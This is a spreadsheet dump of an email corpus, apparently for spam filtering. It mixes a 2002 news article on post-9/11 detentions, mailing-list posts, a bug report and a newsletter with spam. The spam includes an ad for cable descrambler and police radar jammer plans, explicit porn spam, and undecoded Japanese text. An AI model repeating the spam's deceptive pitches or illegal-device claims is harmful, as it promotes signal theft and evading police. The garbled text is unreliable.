 believed that the detentions had "incapacitated and
 disrupted some ongoing terrorist plans." 
 Two federal judges in New York have differed sharply on
 whether the government may jail material witnesses while
 they wait to testify in grand jury investigations. In
 Virginia, a federal judge ordered the government to allow
 Mr. Hamdi to consult a lawyer. 
 "I look at the federal district court judges and just cheer
 them on, because they are doing exactly what an independent
 judiciary should be doing," said Jane E. Kirtley, a
 professor at the University of Minnesota and former
 executive director for the Reporters Committee for Freedom
 of the Press. "It's not hostile or adversarial; it's simply
 skeptical." 
 These lower-court decisions have for the most part not yet
 been tested on appeal, and there is reason to think that
 appeals courts and the Supreme Court will prove more
 sympathetic to the government's tactics and arguments. 
 The federal appeals court in Richmond, Va., for instance,
 reversed the decision to allow Mr. Hamdi to talk to a
 lawyer and ordered the lower court judge to consider
 additional evidence and arguments. 
 But even the appeals court seemed torn, and it rejected the
 government's sweeping argument that the courts have no role
 in reviewing the government's designation of an American
 citizen as an enemy combatant. 
 The detention issues also carry an emotional punch. Many of
 the Arabs and Muslims caught in the government dragnet were
 cabdrivers, construction workers or other types of
 laborers, and some spent up to seven months in jail before
 being cleared of terrorism ties and deported or released. 
 Last month, at a conference held by a federal appeals
 court, Warren Christopher, the secretary of state in the
 Clinton administration, snapped at Viet Dinh, an assistant
 attorney general under President Bush, saying that the
 administration's refusal to identify the people it had
 detained reminded him of the "disappeareds" in Argentina. 
 "I'll never forget going to Argentina and seeing the
 mothers marching in the streets asking for the names of
 those being held by the government," Mr. Christopher said.
 "We must be very careful in this country about taking
 people into custody without revealing their names." 
 Mr. Dinh, who came to the United States as a refugee from
 Vietnam, recalled his family's anguish when his father was
 taken away in 1975 for "re-education." In contrast, he
 said, those detained by the United States were not being
 secretly held but were allowed to go to the press and seek
 lawyers. 
 "These are not incognito detentions," he said. "The only
 thing we will not do is provide a road map for the
 investigations." 
 According to the Justice Department, 752 of the more than
 1,200 people detained since Sept. 11 were held on
 immigration charges. Officials said recently that 81
 remained in detention. Court papers indicate there were
 about two dozen material witnesses, while most of the other
 detainees were held on various state and federal criminal
 charges. 
 President Bush also has announced plans to try suspected
 foreign terrorists before military tribunals, though no
 such charges have been brought yet. 
 Last month, William G. Young, the federal judge presiding
 in Boston over the criminal case against Richard C. Reid, a
 British citizen accused of trying to detonate a bomb in his
 shoe on a trans-Atlantic flight, noted that the very
 establishment of those tribunals "has the effect of
 diminishing the American jury, once the central feature of
 American justice." 
 Judge Young, who was appointed by President Ronald Reagan,
 added: "This is the most profound shift in our legal
 institutions in my lifetime and - most remarkable of all -
 it has taken place without engaging any broad public
 interest whatsoever." 
 Jack Goldsmith and Cass R. Sunstein, professors at the
 University of Chicago Law School, have written that the
 Bush administration's policies are a minimal challenge to
 civil liberties especially compared with changes during the
 times of Abraham Lincoln and Franklin D. Roosevelt. What
 has changed, they say, is a greater sensitivity to civil
 liberties and a vast increase in mistrust of government. 
 The Secrecy 
 U.S. Says Hearings 
 Are Not Trials 
 Ten days
 after last September's attacks, Michael J. Creppy, the
 nation's chief immigration judge, quietly issued sweeping
 instructions to hundreds of judges for what would turn out
 to be more than 600 "special interest" immigration cases. 
 "Each of these cases is to be heard separately from all
 other cases on the docket," Judge Creppy wrote. "The
 courtroom must be closed for these cases - no visitors, no
 family, and no press." 
 "This restriction," he continued, "includes confirming or
 denying whether such a case is on the docket." 
 The government has never formally explained how it decided
 which visa violators would be singled out for this
 extraordinary process, and it has insisted that the
 designations could not be reviewed by the courts. 
 But as it turns out, most of these cases involved Arab and
 Muslim men who were detained in fairly haphazard ways, for
 example at traffic stops or through tips from suspicious
 neighbors. Law enforcement officials have acknowledged that
 only a few of these detainees had any significant
 information about possible terrorists. 
 As the ruling on Friday in Washington suggests, a series of
 legal challenges to this secrecy has resulted in striking
 legal setbacks for the administration. Several courts have
 ordered the proceedings opened and have voiced considerable
 skepticism about the government's justifications for its
 detention policies generally. 
 Lee Gelernt, a lawyer at the American Civil Liberties
 Union, said the secrecy of the proceedings exacerbated the
 hardships faced by people who disappeared from sight on
 violations that in the past would not have resulted in
 incarceration. 
 "Preventive detention," he said, "is such a radical
 departure from constitutional traditions that we certainly
 shouldn't be undertaking it solely on the Justice
 Department's say-so." 
 Malek Zeidan's detention would have been unexceptional had
 it not given rise to one of the legal challenges that
 threatens to end the secret proceedings. 
 Mr. Zeidan, 42, is a Syrian citizen who overstayed his visa
 14 years ago and has lived in Paterson, N.J., for more than
 a decade. Over the years, he has delivered pizzas, driven
 an ice cream truck and pumped gas. When the Immigration and
 Naturalization Service came around last Jan. 31 to ask him
 about a former roommate suspected of marriage fraud, Mr.
 Zeidan was working at Dunkin' Donuts, and his expired visa
 soon cost him 40 days in custody. 
 When a hearing was finally held three weeks after his
 detention, the judge closed the courtroom, excluding Mr.
 Zeidan's cousin and reporters. 
 The closing of proceedings prompted lawsuits in federal
 court, from both Mr. Zeidan and two New Jersey newspapers.
 In March, the government dropped the "special interest"
 designation, Mr. Zeiden was released after posting a bond,
 and the case he filed was dismissed. The immigration
 charges against him will be considered in the fall. 
 "You're one of the lucky ones," his lawyer, Regis
 Fernandez, recalls telling Mr. Zeidan, given that other
 visa violators were held as long as six or seven months
 before being deported or released. 
 Mr. Zeidan's lawyers believe that their legal strategy,
 which focused on openness, forced the government's hand. 
 "The government was somehow linking secrecy to guilt," Mr.
 Fernandez said. "We figured if the public had access to
 these hearings they would see that nothing went on except
 multiple adjournments and delay." 
 Through a spokeswoman, Judge Creppy declined to comment. An
 I.N.S. official, who spoke on the condition that he not be
 named, said the agency had acted properly in Mr. Zeidan's
 case and in similar cases. 
 He said the immigration service had always detained people
 without bond who were linked to criminal investigations. He
 added that the agency had no choice now but to detain a
 visa violator until the Federal Bureau of Investigation was
 sure the person was not involved in terrorism. 
 "Consider the flip side - that you held him for two days
 and then deported him, and 30 days later you found out he
 was a terrorist," the official said. 
 The newspapers' lawsuit has continued. It has already once
 reached the Supreme Court, and the government's papers
 contain one of the fullest accounts of its position on
 secrecy and executive power. 
 Its main argument is that the courts have no role because
 immigration hearings are not really trials, but are merely
 administrative hearings that can be closed at will. 
 Bennet Zurofsky, who also represented Mr. Zeidan, said he
 was flabbergasted by this suggestion. 
 "A trial is a trial," he said. "A person's liberty is at
 stake. A person is being held in jail. A person is being
 told where to live." 
 But in a sworn statement submitted in several court cases,
 Dale L. Watson, the executive assistant director for
 counterterrorism and counterintelligence at the F.B.I.,
 outlined the reasoning behind the government demand for
 total secrecy. 
 "Bits and pieces of information that may appear innocuous
 in isolation can be fit into a bigger picture by terrorist
 groups," he said. 
 This rationale for withholding information, sometimes
 called the mosaic theory, is controversial. 
 "It's impossible to refute," Professor Kirtley said,
 "because who can say with certainty that it's not true?" 
 In May, John W. Bissell, the chief judge of the federal
 district court in Newark, appointed by President Reagan,
 ruled for the newspapers and ordered all deportation
 hearings nationwide to be opened, unless the government is
 able to show a need for a closed hearing on a case-by-case
 basis. His ruling followed a similar one in Detroit the
 month before, though that case involved only a single
 detainee. 
 The government appealed to the Court of Appeals for the
 Third Circuit, in Philadelphia, and asked it to block Judge
 Bissell's order until the appeal was decided. The court,
 which will hear arguments in September, declined to do
 that. A number of news organizations, including The New
 York Times, filed a brief as a friend of the court in
 support of the newspapers. 
 The government then asked the United States Supreme Court
 to stay Judge Bissell's order. The court, in a relatively
 unusual move given that the case was not before it for any
 other purpose, blocked Judge Bissell's order, suggesting
 that it might have more sympathy for the government's
 arguments. 
 The Witnesses 
 Rights Violated, 
 Lawyers Contend 
 Late on Sept. 12, federal agents pulled
 two nervous Indian men, Mohammed Jaweed Azmath and Syed Gul
 Mohammed Shah, off an Amtrak train near Fort Worth. They
 were carrying box cutters, black hair dye and about $5,000
 in cash and had also shaved their body hair. 
 The agents' suspicions were obvious. The hijackers had used
 box cutters and knives to take control of the aircraft and
 had received letters instructing them to "shave excess hair
 from the body." An F.B.I. affidavit dated Sept. 15 said
 there was probable cause to believe that both of the Indian
 men were involved in, or "were associated" with, those
 responsible for the Sept. 11 attacks. 
 But even though government officials told reporters that
 the men had been detained as material witnesses, their
 lawyers now say that they were held last fall only on
 immigration violations. 
 The distinction is important because a material witness
 warrant brings the automatic appointment of a
 government-paid lawyer, while the government does not have
 to supply a visa violator with counsel. 
 As a result, the authorities were able to question each of
 the men repeatedly about terrorism without a lawyer
 present, their current lawyers say. 
 Like some of the people who were picked up as material
 witnesses, the Indian men were held in isolation in jails
 in New York for extended periods. It was 91 days before Mr.
 Azmath received a lawyer and 57 days before Mr. Shah did,
 their lawyers say. 
 "It's wrong to keep a man in jail for 57 days and never
 bring him before a magistrate to advise him of his rights,"
 Mr. Shah's lawyer, Lawrence K. Feitell, said in an
 interview. "It's wrong not to provide him with an attorney
 at the threshold. It's wrong to depict this as an I.N.S.
 investigation, when in truth and in fact, it's the main
 inquiry into the World Trade Center debacle." 
 Anthony L. Ricco, the lawyer for Mr. Azmath, said his
 client was interrogated "often times for several hours a
 day, with multiple interviewers, getting rapid-fire
 questions from three or four different people." 
 Eventually, the F.B.I. and the prosecutors cleared the men
 of any involvement in terrorism, and both pleaded guilty in
 June in a credit-card fraud scheme and are awaiting
 sentencing. 
 Federal prosecutors said in court papers that both men
 consented to questioning. Each "was read and waived his
 Miranda rights before each interview," prosecutors wrote,
 adding that each man confessed to the credit card offenses.
 The United States attorney in Manhattan, James B. Comey,
 would not comment on the specific cases, but said generally
 of the government's tactics: "I don't see any violation of
 any rule, regulation, or law. 
 "I can understand defense lawyers not being happy," he
 said. "But I know our position after 9/11 was to use every
 available tool, to stay within the rules but play the whole
 field and recognize the boundaries, but cover the whole
 field. 
 "We need to do whatever we can that's legal to investigate
 and disrupt," he added. 
 Today, it is believed that only a handful of the two dozen
 material witnesses, perhaps as few as two, are still being
 detained. 
 But the process of detaining the witnesses has stirred
 intense criticism. 
 Last April, Judge Shira A. Scheindlin of Federal District
 Court in Manhattan ruled that the use of the law "to detain
 people who are presumed innocent under our Constitution in
 order to prevent potential crimes is an illegitimate use of
 the statute." 
 Judge Scheindlin said the material witness law applied when
 witnesses were held to give testimony at trials, not for
 grand jury investigations. "Since 1789," Judge Scheindlin
 said, "no Congress has granted the government the authority
 to imprison an innocent person in order to guarantee that
 he will testify before a grand jury conducting a criminal
 investigation." 
 Then last month, Chief Judge Michael B. Mukasey, also of
 Federal District Court in Manhattan, upheld the
 government's use of the material witness statute in grand
 jury investigations, criticizing Judge Scheindlin's
 reasoning. 
 Judge Mukasey, citing the assertion in 1807 by Chief
 Justice John Marshall that "the public has a right to every
 man's evidence," held that detentions of material witnesses
 during investigations are proper. 
 The War Captives 
 No Lawyers Allowed 
 Under U.S. Label 
 Yasser Esam Hamdi, a
 Saudi national who was captured in Afghanistan, is probably
 an American citizen by virtue of having been born in
 Louisiana. His case represents the core issue of what kind
 of role the nation's courts should have, if any, in
 reviewing the government's imprisonment of someone charged
 with something akin to a war crime. 
 Prosecutors will be back in Federal District Court in
 Norfolk, Va., next Thursday to confront one of the federal
 judges who has shown resistance to the government's
 approach that once someone is declared an "enemy combatant"
 by the president, all judicial review ceases. 
 Judge Robert G. Doumar, an appointee of President Reagan,
 has twice ruled that Mr. Hamdi is entitled to a lawyer and
 ordered the government to allow Frank Dunham, the federal
 public defender, to be allowed to visit him without
 government officials or listening devices. Judge Doumar
 said that "fair play and fundamental justice" require it.
 He said the government "could not cite one case where a
 prisoner of any variety within the jurisdiction of a United
 States District Court, who was held incommunicado and
 indefinitely." 
 But the three-judge panel of the appeals court stayed Judge
 Doumar's order, saying he had not fully considered the
 government's needs to keep Mr. Hamdi incommunicado and,
 more important, the executive branch's primacy in areas of
 foreign and military affairs. 
 "The authority to capture those who take up arms against
 America belongs to the commander in chief," Chief Judge J.
 Harvie Wilkinson 3rd wrote for the appeals panel. 
 But even Judge Wilkinson seemed to evince some surprise at
 the breadth of what the government was asserting when he
 asked the Justice Department's lawyer, "You are saying that
 the judiciary has no right to inquire at all into someone's
 stature as an enemy combatant?" 
 The government has relented slightly, agreeing to provide
 the court with a sealed declaration of the criteria by
 which they have judged Mr. Hamdi to be an enemy combatant.
 But the government has argued that judges cannot argue with
 the standards. 
 Judge Doumar has indicated that he will question the
 government closely on those standards. 
 The case of Jose Padilla, which has not progressed as far
 as that of Mr. Hamdi, may present an even greater challenge
 to normal judicial procedures. 
 Mr. Padilla, also known as Abdullah al-Muhajir, is, like
 Mr. Hamdi, an American citizen, imprisoned in a naval brig
 after having been declared an enemy combatant. But unlike
 Mr. Hamdi, Mr. Padilla was not arrested on the battlefield
 by the military but on United States soil by civil law
 enforcement authorities, on May 8 in Chicago. 
 After his detention as a material witness based on
 suspicions that he was seeking to obtain material and
 information to build a radioactive bomb, he was transferred
 to military custody. 
 "This is the model we all fear or should fear," said Mr.
 Dunham, the public defender. "The executive branch can
 arrest an American citizen here and then declare him an
 enemy combatant and put him outside the reach of the
 courts. They can keep him indefinitely without charging him
 or giving him access to a lawyer or presenting any
 evidence."
 http://www.nytimes.com/2002/08/04/national/04CIVI.html?ex=1029550865&amp;ei=1&amp;en=c82350bcf915e44e
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Sep 17, 2002 at 09:11:01PM -0700, Paul Prescod wrote:
 &gt; Owen Byrne wrote:
 &gt; &gt;...
 &gt; &gt;
 &gt; &gt;Except that parroting the party line doesn't really require much
 &gt; &gt;freedom of speech. Now if you had posted something from a left of
 &gt; &gt;center source, you would have been shouted down in flames, buried in 
 &gt; &gt;ad hominem attacks, and probably get your name added to an FBI list. 
 &gt; 
 &gt; Do you think it is really useful to combat hysterical right-wing 
 &gt; propoganda with hysterical left-wing propoganda?
 &gt; 
 Sure it is - it tends to bring out the people who let "hysterical
 right wing propaganda" spew forth, while reaching for their gun 
 whenever a "liberal" enters the room.
 my hysterical left wing "propaganda" is generally an emotional
 reaction on a mailing list, not an organizaed attempt at converting
 people's thinking through lies and distortion (as was the original
 article). 
 Whereas your constant and predictable brandings of my postings are, to
  my mind, a deliberate and reasoned  effort to reduce debate, and
  discourage left of center postngs. 
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Plans for cable
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Want to watch Sporting Events?--Movies?--Pay-Per-View?? 
 You can assemble from electronic store parts for about $12.00.
 We Send You:
 E-Z To follow Assembly Instructions
 E-Z To read Original Drawings.
 Electronic parts lists.
 PLUS SOMETHING NEW YOU MUST HAVE! 
 Something you can't do without. 
 THE UP-TO-DATE REPORT: USING A DESCRAMBLER LEGALLY 
 Warning: You should not build a TV Descrambler without 
 reading this report first. 
 Frequently Asked Questions--CABLE TV DESCRAMBLER 
 Q: Will the descrambler work on Fiber, TCI, Jarrod 
 A: The answer is YES. 
 Q: Do I need a converter box?
 A: This plan works with or without a converter box.
 Specific instructions are included in the plans for each! 
 Q: Can the cable company detect that I have the descrambler?
 A: No, the signal descrambles right at the box and does
 not move back through the line! 
 Q: Do I have to alter my existing cable system, 
 television or VCR?
 A: The answer is no! 
 Q: Does this work with my remote control?
 A: The answer is yes. The descrambler is 
 manually controlled--but very easy to use! 
 Q: Can you email me the plans?
 A: No the program comes with an easy to follow picture guide. 
 Q: Does this work everywhere across the country?
 A: Yes, every where in the USA plus England,
 Brazil, Canada and other countries! 
 Q: Is this deal guaranteed?
 A: Yes, if you are unhappy for any reason we will refund your money.
 ORDER INFORMATION 
 ACT WITHIN THE NEXT 7 DAYS AND RECEIVE TWO FREE BONUS!!
 THE CABLE MANUAL! This manual contains hard to find information your
 cable company does not want you to know. Also receive The RADAR
 JAMMER PLANS! Never get another speeding ticket. Build you own
 radar jammer, this unit will jam police radar so they can't get a 
 reading on 
 your vechicle. Radar jammers are legal in 48 states. It is simple to 
 build.
 The FREE BONUSES ALONE ARE WORTH ACTING NOW! 
 THE CABLE DESCRAMBLER KIT COMES WITH A THIRTY DAY
 MONEY BACK GUARANTEE! IF YOUR NOT COMPLETELY SATISFIED,
 SEND THE CABLE DESCRAMBLER KIT BACK AND YOU KEEP
 THE BONUSES FOR FREE. YOU HAVE NOTHING TO LOSE!!
 REGULAR PRICE $19.95 ACT WITHIN THE NEXT 7 DAYS
 AND RECEIVE FOR $12.95 ACT NOW!! 
 SIMPLY SEND $12.95 THAT'S RIGHT ONLY $12.95 BUT YOU MUST 
 ACT WITHIN 7 DAYS FOR THIS SPECIAL PRICE!!!
 SEND $12.95 CHECK OR MONEY ORDER.
 TO:
 GPG SOFTWARE
 12105 WEST CENTER RD #382
 OMAHA, NE 68144
 THIS INFORMATION IS SOLD FOR EDUCATIONAL PURPOSES ONLY
 If you would like to be removed richeyg40@yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 After my latest cvs up, timtest fails with
     Traceback (most recent call last):
       File "/home/skip/src/spambayes/timtest.py", line 294, in ?
         drive(nsets)
       File "/home/skip/src/spambayes/timtest.py", line 264, in drive
         d = Driver()
       File "/home/skip/src/spambayes/timtest.py", line 152, in __init__
         self.global_ham_hist = Hist(options.nbuckets)
     AttributeError: 'OptionsClass' object has no attribute 'nbuckets'
 I'm running it as
     timtest -n5 &gt; Data/timtest.out
 from my ~/Mail directory (not from my ~/src/spambayes directory).  If I
 create a symlink to ~/src/spambayes/bayes.ini it works once again, but
 shouldn't there be an nbuckets attribute with a default value already?
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Re: Account For Lesbian Teen-Sex  foml
</t>
  </si>
  <si>
    <t xml:space="preserve">################################################
 #                                              #=20
 #     Free Hardcore Porn - VIP Membership      #
 #                                              #=20
 ################################################
 YOUR INSTANT ACCESS PASSWORD
 LOGIN NAME:   cpunks@minder.net=20
 PASSWORD:     EzKWGy4H
 Naughty Live Cam=20
 http://157.237.128.20/cams/?aid=3D603367=20
 Teen Sex Dolls=20
 http://157.237.128.20/teen/?aid=3D603367=20
 Play House Porn=20
 http://157.237.128.20/play/?aid=3D603367=20
 WHAT YOU GET FOR FREE:
 =B7 XXX Hardcore Videos=20
 =B7 Live Feeds 24-7=20
 =B7 One on One Chat=20
 =B7 Spy Cams=20
 =B7 Games
 =B7 Daily Teen Sex Pic=20
 =B7 Lesbian Teen-Sex=20
 =B7 Oral Sex=20
 =B7 Big Boobs
 =B7 Voyeur Cams
 =B7 XXX Porn Movies=20
 =B7 Live Fucking=20
 =B7 Cum Shots=20
 =B7 Domination=20
 =B7 Group Sex
 =B7 Pissing Cams
 =B7 Exclusive Centerfolds=20
 =B7 Freaky Sex=20
 =B7 Shower Cams=20
 =B7 Asians=20
 =B7 Erotic Stories
 =B7 Amateur Videos
 =B7 Fantasy Babes=20
 =B7 Adult XXX TV=20
 =B7 Hardcore Mags=20
 =B7 Nude Celebs=20
 =B7 Facials
 =B7 And More..
 Removal Instructions:
 You have received this advertisement because you have opted in to receive=
  free adult internet offers and specials through our affiliated websites.=
  If you do not wish to receive further emails or have received the email =
 in error you may opt-out of our database here: http://157.237.128.20/opto=
 ut. Please allow 24hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion=
  and Privacy Protection Act. section 50 marked as 'Advertisement' with va=
 lid 'removal' instruction.
 vkhehrhnygrhfgolrckpvffrkrrhipuwo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</si>
  <si>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=?ISO-2022-JP?B?GyRCTCQ+NUJ6OS05cCIoPF5HLiEqPVAycSQkJE45LT5sGyhC?=
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;_x001b_$B;v6H&lt;T_x001b_(B&gt;
 _x001b_$B;aL&gt;_x001b_(B:Vip-mail
 _x001b_$BFMA3$N%a!&lt;%k&lt;:Ni$$$?$7$^$9!#_x001b_(B
 _x001b_$B:#8e$3$N9-9p$,$4ITMW$JJ}$O$=$N;]$r_x001b_(B
 stop-vip@e-project-web.com
 _x001b_$B$^$G$*Aw$j2&lt;$5$$!#_x001b_(B
 _x001b_$B!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y_x001b_(B
 _x001b_$B"v%j%C%A$J=P2q$$$O_x001b_(BVip-mail_x001b_$B$G"v_x001b_(B
 Vip-mail_x001b_$B$,%O%$%/%i%9$J=P2q$$$r%W%l%&lt;%s%H!y_x001b_(B
 _x001b_$B7HBS_x001b_(B3_x001b_$B%-%c%j%"$H_x001b_(BPC_x001b_$BBP1~$N=P2q$$%5%$%H"v_x001b_(B
 _x001b_$B:#$^$G$N=P2q$$%5%$%H$KK0$-$??M_x001b_(B!
 _x001b_$B=P2q$$$OM_$7$$$1$I%5%$%H$r;H$&amp;$N$O$HLB$C$F$k?M_x001b_(B!
 _x001b_$B:#D&gt;$0_x001b_(BVip-mail_x001b_$B$K_x001b_(BGo!!!!!
 http://www.vip-jp.net/?sid=2
 _x001b_$B=w@-L5NA$OEv$?$jA0_x001b_(B!?
 _x001b_$BCK@-$K$O$*;n$7%]%$%s%H_x001b_(B50pt_x001b_$B%W%l%&lt;%s%H!y_x001b_(B
 _x001b_$B=w@-$O%j%C%A$JCK@-$r_x001b_(BGET_x001b_$B$7$h$&amp;_x001b_(Bo(_x001b_$B!f"`!e_x001b_(B)o
 _x001b_$BCK@-$O$*;n$7%]%$%s%H5$$KF~$C$?L&lt;$r8+$D$1$h$&amp;_x001b_(B(_x001b_$B"`!c_x001b_(B)b
 _x001b_$B=P2q$$$r5a$a$k$J$i_x001b_(BVip-mail_x001b_$B$K:#D&gt;$0%"%/%;%9_x001b_(B
 _x001b_$B"-"-"-"-"-"-"-"-"-"-"-"-"-"-_x001b_(B
 http://www.vip-jp.net/?sid=2
 _x001b_$B!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y!z!y_x001b_(B
 _x001b_$BFMA3$N%a!&lt;%k&lt;:Ni$$$?$7$^$7$?!#_x001b_(B
 _x001b_$B:#8e$3$N9-9p$,$4ITMW$JJ}!"G[?.Dd;_$r4uK&gt;$5$l$kJ}$O$=$N;]$r_x001b_(B
 stop-vip@e-project-web.com
 _x001b_$B$^$G$*Aw$j2&lt;$5$$_x001b_(B
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: flavor cystals
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera, &lt;Joseph&gt; writes:
     J&gt; Better yet, tell me where I should be listening for new music
     J&gt; now that P2P is dead and I still can't pick up KFJC very well.
 How about your local pub?
 (sorry couldn't resist)
 I still use Live365; slowly the disconnected stations are returning,
 since the fee to stay on the air can be as low as $6/month, and if
 your fave broadcaster won't pay, you're given the option to pay for
 them.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: QuickTime News: July 26, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --This_is_the_boundary_hip_ho
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 You appear to be using an email application that won't properly
 display the graphical (or HTML) version of our newsletter. Because
 we want you to enjoy reading QuickTime News, we recommend that you
 visit the following site and switch to the plain text version of
 this newsletter:
     http://www.apple.com/enews/change/
 If you have trouble reading today's issue of QuickTime News, please
 consider visiting the following web page where it has been posted
 for your enjoyment:
     http://www.apple.com/enews/currentqissue/
 If you receive a blank message with an enclosure, drag the enclosure
 into the window of your web browser and today's issue of QuickTime News
 will display in your web browser.
 Thank you.
 --This_is_the_boundary_hip_ho
 Content-Type: text/html; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;QuickTime News: July 26, 2002&lt;/title&gt;
 	&lt;meta name="generator" content="BBEdit 6.0.1"&gt;
 &lt;/head&gt;
 &lt;body background="http://a772.g.akamai.net/7/772/51/c241f0d493a981/www.apple.com/enews/eimages/stripes.gif" bgcolor="#CCCCCC"&gt;
 &lt;!-- START MAIN TABLE --&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table border="0" width="600" cellspacing="0" cellpadding="0" align="center"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/9fa804f4688ffc/www.apple.com/enews/2002/05/images/box-topleft.gif" alt="" width="1" height="14" border="0"&gt;&lt;/td&gt;
 		&lt;td&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/c22ed219eeb953/www.apple.com/enews/2002/05/images/box-topmiddle.gif" alt="" width="598" height="14" border="0"&gt;&lt;/td&gt;
 		&lt;td&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/97518749dde4f5/www.apple.com/enews/2002/05/images/box-topright.gif" alt="" width="1" height="14" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td bgcolor="#7e7e7e"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/84485f130fd0fe/www.apple.com/enews/eimages/spacer.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 		&lt;td bgcolor="#ffffff"&gt;
 		&lt;a href="http://www.apple.com/quicktime/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/8c1280c5572c24/www.apple.com/enews/2002/05/images/logo-quicktime.gif" alt="" width="366" height="52" border="0"&gt;&lt;/a&gt;&lt;a href="http://www.apple.com/enews/schedule/"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/405c7d71bf1a3b/www.apple.com/enews/2002/07/images/26vol.gif" alt="" width="232" height="52" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 		&lt;a href="http://www.apple.com/hotnews/"&gt;&lt;img src="http://a1552.g.akamai.net/7/1552/51/1e05f706dc3a33/www.apple.com/enews/2002/07/images/25ticker.gif" alt="" width="598" height="28" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 		&lt;table border="0" cellpadding="0" cellspacing="0" width="598"&gt;
 			&lt;tr&gt;
 				&lt;td&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/84485f130fd0fe/www.apple.com/enews/eimages/spacer.gif" alt="" width="8" height="1" border="0"&gt;&lt;/td&gt;
 				&lt;td valign="top"&gt;
 				&lt;img src="http://a772.g.akamai.net/7/772/51/93e5c294690bb5/www.apple.com/enews/eimages/thisissue.gif" alt="In This Issue:" width="150" height="40" border="0"&gt;&lt;br&gt;
 				&lt;a href="#article1"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/bb9fb46de41f5f/www.apple.com/enews/2002/07/images/26qtc1.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article2"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/f8e16e24427062/www.apple.com/enews/2002/07/images/26qtc2.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article3"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/95c481448e9005/www.apple.com/enews/2002/07/images/26qtc3.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article4"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/67f3124e242d18/www.apple.com/enews/2002/07/images/26qtc4.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article5"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/9562dd6341274e/www.apple.com/enews/eimages/toc_qtpark.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article1"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/7cee5fe5dea417/www.apple.com/enews/eimages/toc_qtmusic.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;a href="#article7"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/3efcf8160adc84/www.apple.com/enews/eimages/toc_arrow.gif" alt="" width="11" height="20" border="0"&gt;&lt;img src="http://a772.g.akamai.net/7/772/51/5de80697882f02/www.apple.com/enews/eimages/toc_quicktakes.gif" alt="" width="340" height="20" border="0"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;/td&gt;
 				&lt;td&gt;
